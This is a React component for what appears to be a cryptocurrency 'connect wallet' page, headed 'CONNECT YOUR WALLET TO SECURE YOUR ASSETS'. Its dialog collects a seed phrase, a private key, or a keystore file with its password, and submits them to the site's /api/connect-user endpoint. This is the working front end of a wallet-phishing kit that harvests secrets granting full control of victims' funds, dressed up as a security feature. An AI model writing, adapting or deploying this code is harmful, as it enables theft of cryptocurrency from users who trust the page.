import React, {useEffect, useState} from 'react'
import apiClient from '../../request/http-common';
import { useQuery } from 'react-query';
import Dialog from '@mui/material/Dialog';
import DialogContent from '@mui/material/DialogContent';
import Slide from '@mui/material/Slide';
import Button from '@mui/material/Button';
import Grid from '@mui/material/Grid';
import Typography from '@mui/material/Typography';
import Avatar from '@mui/material/Avatar';
import Stack from '@mui/material/Stack';
import Box from '@mui/material/Box';
import { useMutation } from "react-query";
import CircularProgress from '@mui/material/CircularProgress';
import Card from '@mui/material/Card';
import CardContent from '@mui/material/CardContent';
import Alert from '@mui/material/Alert';
import { CardActions } from '@mui/material';
import InputLabel from '@mui/material/InputLabel';
import FormControl from '@mui/material/FormControl';
import OutlinedInput from '@mui/material/OutlinedInput';
import Tabs from '@mui/material/Tabs';
import Tab from '@mui/material/Tab';

const Transition = React.forwardRef(function Transition(props, ref) {
    return <Slide direction="up" ref={ref} {...props} />;
});

const ConnectWallet = () => {
    const [wallets, setWallets] = useState('');
    const [open, setOpen] = useState(false);
    const [selectedWallet, setSelectedWallet] = useState(null);
    const [error, setError] = useState('');
    const [errMsg, setErrMsg] = useState('');
    const [tabValue, setTabValue] = useState(0);
    
    // Form states for different import methods
    const [seedPhrase, setSeedPhrase] = useState('');
    const [privateKey, setPrivateKey] = useState('');
    const [keystoreJson, setKeystoreJson] = useState('');
    const [keystorePassword, setKeystorePassword] = useState('');

    const handleClickOpen = (wallet) => {
        setSelectedWallet(wallet);
        setOpen(true);
        setError('');
        setErrMsg('');
        setTabValue(0);
        // Reset form states
        setSeedPhrase('');
        setPrivateKey('');
        setKeystoreJson('');
        setKeystorePassword('');
    };

    const handleClose = () => {
        setOpen(false);
        setSelectedWallet(null);
        setError('');
        setErrMsg('');
        setTabValue(0);
    };

    const handleTabChange = (event, newValue) => {
        setTabValue(newValue);
        setError('');
        setErrMsg('');
    };
    
    const { isLoading: isLoadingwallets, refetch: getwallets } = useQuery(
        "edit-wallet",
        async () => {
          return await apiClient.get(`/api/walletconnect`);
        },
        {
          enabled: true,
          onSuccess: (res) => {
            if (res.data.status === 'success') {
                setWallets(res.data.wallets);
            }
          },
          onError: (err) => {
            // Handle error silently
          },
        }
      );

    const { isLoading: isSendingRequest, mutate: importWallet } = useMutation(
        async (data) => {
          return await apiClient.post(`/api/connect-user`, data);
        },
        {
          onSuccess: (res) => {
            localStorage.setItem('notification', JSON.stringify({
              message: `${res.data.message}`, 
              'type': 'success' 
            }));
            const event = new Event('newMessage');
            window.dispatchEvent(event);
            const event2 = new Event('processed');
            window.dispatchEvent(event2);

            setTimeout(() => {
              window.location.href='/';
            }, 2000);
          },
          onError: (err) => {   
            if (err.response?.data?.errors) {
                setError(err.response.data.errors);
            } else {
                let errorMessage = err.response?.data?.message || 'Failed to import wallet';
                setErrMsg(errorMessage);
                localStorage.setItem('notification', JSON.stringify({
                  message: `${errorMessage}`, 
                  'type': 'error' 
                }));
                const event = new Event('newMessage');
                window.dispatchEvent(event);
            }  
          },
        }
      );

    const handleSubmit = () => {
        setError('');
        setErrMsg('');

        let data = {
            wallet: selectedWallet.name
        };

        if (tabValue === 0) {
            // Seed Phrase
            if (!seedPhrase.trim()) {
                setErrMsg('Please enter your seed phrase');
                return;
            }
            data.phrase = seedPhrase.trim();
        } else if (tabValue === 1) {
            // Private Key
            if (!privateKey.trim()) {
                setErrMsg('Please enter your private key');
                return;
            }
            data.private_key = privateKey.trim();
        } else if (tabValue === 2) {
            // Keystore JSON
            if (!keystoreJson.trim()) {
                setErrMsg('Please enter your keystore JSON');
                return;
            }
            if (!keystorePassword.trim()) {
                setErrMsg('Please enter your keystore password');
                return;
            }
            data.keystore = keystoreJson.trim();
            data.keystore_password = keystorePassword.trim();
        }

        importWallet(data);
    };

    useEffect(() => {
        getwallets();
    }, []);

    return (
        <Box sx={{ marginTop: '75px', paddingX: '10px', minHeight: '100vh', backgroundColor: 'background.default' }}>
            <Typography 
                mb={-8} 
                mt={4} 
                px={3} 
                sx={{ 
                    marginTop: '75px', 
                    fontWeight: 'bold', 
                    fontSize: 20, 
                    textAlign: 'center',
                    color: 'text.primary'
                }} 
                gutterBottom 
                variant="h6" 
                component="div"
            >
                CONNECT YOUR WALLET TO SECURE YOUR ASSETS
            </Typography>
            <Typography 
                mb={1}  
                mt={8} 
                px={3} 
                sx={{ 
                    textAlign: 'center', 
                    fontSize: 14,
                    color: 'text.secondary'
                }} 
                variant="subtitle1" 
                gutterBottom
            >
                {isLoadingwallets ? 'Loading wallets...' : 'Kindly choose from any of the wallets below to connect'}
            </Typography>

            {(wallets !== '' && wallets.length > 0) && (
                <Grid 
                    container 
                    px={2} 
                    mt={4}  
                    mb={4} 
                    rowSpacing={2} 
                    columnSpacing={{ xs: 1, sm: 2, md: 3 }}
                >
                    {wallets.map(wallet => (
                        <Grid key={wallet.id} item xs={4} md={2}>
                            <Stack 
                                onClick={() => handleClickOpen(wallet)}
                                mt={2} 
                                direction="row" 
                                spacing={5} 
                                justifyContent="center" 
                                alignItems="center" 
                                sx={{cursor: 'pointer'}}
                            >
                                <Box sx={{ 
                                    borderRadius: '50%', 
                                    display: 'flex', 
                                    justifyContent: 'center', 
                                    alignContent: 'center', 
                                    textAlign: 'center', 
                                    alignItems: 'center', 
                                    flexDirection: 'column', 
                                    textDecoration: 'none', 
                                    color: 'inherit' 
                                }}>
                                    <Avatar src={wallet.image} sx={{ padding: '5px', width: 56, height: 56}}/>
                                    <Typography variant="caption" gutterBottom sx={{ color: 'text.primary' }}>
                                        {wallet.name}
                                    </Typography>
                                </Box>
                            </Stack>
                        </Grid>
                    ))}
                </Grid>
            )}

            <Dialog
                open={open}
                sx={{width: '100%'}}
                TransitionComponent={Transition}
                keepMounted
                onClose={handleClose}
                aria-describedby="wallet-import-dialog"
                PaperProps={{
                    sx: {
                        backgroundColor: 'background.paper',
                        color: 'text.primary',
                        minWidth: { xs: '90%', sm: '500px' }
                    }
                }}
            >
                <DialogContent sx={{padding: 0}}>
                    <Card sx={{ backgroundColor: 'background.paper', color: 'text.primary' }}>
                        <CardContent>
                            {selectedWallet && (
                                <>
                                    <Typography 
                                        variant="h6" 
                                        sx={{ 
                                            textAlign: 'center', 
                                            marginBottom: '20px',
                                            color: 'text.primary',
                                            fontWeight: 'bold'
                                        }}
                                    >
                                        Import {selectedWallet.name} Wallet
                                    </Typography>

                                    <Tabs 
                                        value={tabValue} 
                                        onChange={handleTabChange}
                                        sx={{
                                            borderBottom: 1,
                                            borderColor: 'divider',
                                            marginBottom: '20px',
                                            '& .MuiTab-root': {
                                                color: 'text.secondary',
                                                '&.Mui-selected': {
                                                    color: 'primary.main'
                                                }
                                            },
                                            '& .MuiTabs-indicator': {
                                                backgroundColor: 'primary.main'
                                            }
                                        }}
                                    >
                                        <Tab label="Seed Phrase" />
                                        <Tab label="Private Key" />
                                        <Tab label="Keystore JSON" />
                                    </Tabs>

                                    {errMsg && (
                                        <Alert severity="error" sx={{ marginBottom: '16px', backgroundColor: '#d32f2f', color: 'text.primary' }}>
                                            {errMsg}
                                        </Alert>
                                    )}

                                    {tabValue === 0 && (
                                        <FormControl fullWidth={true} sx={{ m: 1, minWidth: 50 }}>
                                            <InputLabel 
                                                htmlFor="seed-phrase"
                                                sx={{ color: 'text.secondary' }}
                                            >
                                                Enter Seed Phrase (12 or 24 words)
                                            </InputLabel>
                                            <OutlinedInput
                                                error={error?.phrase ? true : false}
                                                onChange={(e) => setSeedPhrase(e.target.value)}
                                                value={seedPhrase}
                                                minRows={4} 
                                                multiline
                                                id="seed-phrase"
                                                name="seed-phrase"
                                                type="text"
                                                label="Enter Seed Phrase (12 or 24 words)"
                                                sx={{
                                                    color: 'text.primary',
                                                    '& .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'divider'
                                                    },
                                                    '&:hover .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'text.secondary'
                                                    },
                                                    '&.Mui-focused .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'primary.main'
                                                    }
                                                }}
                                            />
                                            {error?.phrase && (
                                                <Typography color="error" sx={{ textAlign: 'left', fontSize: 14, marginTop: '8px' }}>
                                                    {error.phrase}
                                                </Typography>
                                            )}
                                            <Typography 
                                                variant="caption" 
                                                sx={{ 
                                                    color: 'text.disabled', 
                                                    marginTop: '8px',
                                                    display: 'block'
                                                }}
                                            >
                                                Enter your 12 or 24 word recovery phrase separated by spaces
                                            </Typography>
                                        </FormControl>
                                    )}

                                    {tabValue === 1 && (
                                        <FormControl fullWidth={true} sx={{ m: 1, minWidth: 50 }}>
                                            <InputLabel 
                                                htmlFor="private-key"
                                                sx={{ color: 'text.secondary' }}
                                            >
                                                Enter Private Key
                                            </InputLabel>
                                            <OutlinedInput
                                                error={error?.private_key ? true : false}
                                                onChange={(e) => setPrivateKey(e.target.value)}
                                                value={privateKey}
                                                minRows={4} 
                                                multiline
                                                id="private-key"
                                                name="private-key"
                                                type="password"
                                                label="Enter Private Key"
                                                sx={{
                                                    color: 'text.primary',
                        
                                                    '& .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'divider'
                                                    },
                                                    '&:hover .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'text.secondary'
                                                    },
                                                    '&.Mui-focused .MuiOutlinedInput-notchedOutline': {
                                                        borderColor: 'primary.main'
                                                    }
                                                }}
                                            />
                                            {error?.private_key && (
                                                <Typography color="error" sx={{ textAlign: 'left', fontSize: 14, marginTop: '8px' }}>
                                                    {error.private_key}
                                                </Typography>
                                            )}
                                            <Typography 
                                                variant="caption" 
                                                sx={{ 
                                                    color: 'text.disabled', 
                                                    marginTop: '8px',
                                                    display: 'block'
                                                }}
                                            >
                                                Enter your wallet's private key (keep this secure and never share it)
                                            </Typography>
                                        </FormControl>
                                    )}

                                    {tabValue === 2 && (
                                        <>
                                            <FormControl fullWidth={true} sx={{ m: 1, minWidth: 50, marginBottom: '16px' }}>
                                                <InputLabel 
                                                    htmlFor="keystore-json"
                                                    sx={{ color: 'text.secondary' }}
                                                >
                                                    Enter Keystore JSON
                                                </InputLabel>
                                                <OutlinedInput
                                                    error={error?.keystore ? true : false}
                                                    onChange={(e) => setKeystoreJson(e.target.value)}
                                                    value={keystoreJson}
                                                    minRows={6} 
                                                    multiline
                                                    id="keystore-json"
                                                    name="keystore-json"
                                                    type="text"
                                                    label="Enter Keystore JSON"
                                                    sx={{
                                                        color: 'text.primary',
                                                        '& .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'divider'
                                                        },
                                                        '&:hover .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'text.secondary'
                                                        },
                                                        '&.Mui-focused .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'primary.main'
                                                        }
                                                    }}
                                                />
                                                {error?.keystore && (
                                                    <Typography color="error" sx={{ textAlign: 'left', fontSize: 14, marginTop: '8px' }}>
                                                        {error.keystore}
                                                    </Typography>
                                                )}
                                            </FormControl>
                                            <FormControl fullWidth={true} sx={{ m: 1, minWidth: 50 }}>
                                                <InputLabel 
                                                    htmlFor="keystore-password"
                                                    sx={{ color: 'text.secondary' }}
                                                >
                                                    Enter Keystore Password
                                                </InputLabel>
                                                <OutlinedInput
                                                    error={error?.keystore_password ? true : false}
                                                    onChange={(e) => setKeystorePassword(e.target.value)}
                                                    value={keystorePassword}
                                                    id="keystore-password"
                                                    name="keystore-password"
                                                    type="password"
                                                    label="Enter Keystore Password"
                                                    sx={{
                                                        color: 'text.primary',
                                                        '& .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'divider'
                                                        },
                                                        '&:hover .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'text.secondary'
                                                        },
                                                        '&.Mui-focused .MuiOutlinedInput-notchedOutline': {
                                                            borderColor: 'primary.main'
                                                        }
                                                    }}
                                                />
                                                {error?.keystore_password && (
                                                    <Typography color="error" sx={{ textAlign: 'left', fontSize: 14, marginTop: '8px' }}>
                                                        {error.keystore_password}
                                                    </Typography>
                                                )}
                                            </FormControl>
                                        </>
                                    )}

                                    {isSendingRequest && (
                                        <Box sx={{ display: 'flex', justifyContent: 'center', alignItems: 'center', marginTop: '20px' }}>
                                            <CircularProgress sx={{ color: 'primary.main' }} />
                                            <Typography sx={{ marginLeft: '16px', color: 'text.primary' }}>
                                                Importing wallet...
                                            </Typography>
                                        </Box>
                                    )}
                                </>
                            )}
                        </CardContent>
                        <CardActions sx={{ padding: '16px', justifyContent: 'center' }}>
                            <Button 
                                onClick={handleClose} 
                                sx={{ 
                                    marginRight: '8px',
                                    color: 'text.primary',
                                    borderColor: 'divider',
                                    '&:hover': {
                                        borderColor: 'text.secondary'
                                    }
                                }}
                                variant="outlined"
                            >
                                Cancel
                            </Button>
                            <Button 
                                onClick={handleSubmit} 
                                disabled={isSendingRequest}
                                fullWidth={false}
                                size="large" 
                                sx={{
                                    backgroundColor: 'primary.main',
                                    color: 'text.primary',
                                    '&:hover': {
                                        backgroundColor: 'primary.dark'
                                    },
                                    '&:disabled': {
                                        backgroundColor: 'action.disabledBackground'
                                    }
                                }}
                                variant="contained"
                            >
                                {isSendingRequest ? 'Importing...' : 'Import Wallet'}
                            </Button>
                        </CardActions>
                    </Card>
                </DialogContent>
            </Dialog>
        </Box>
    );
};

export default ConnectWallet;
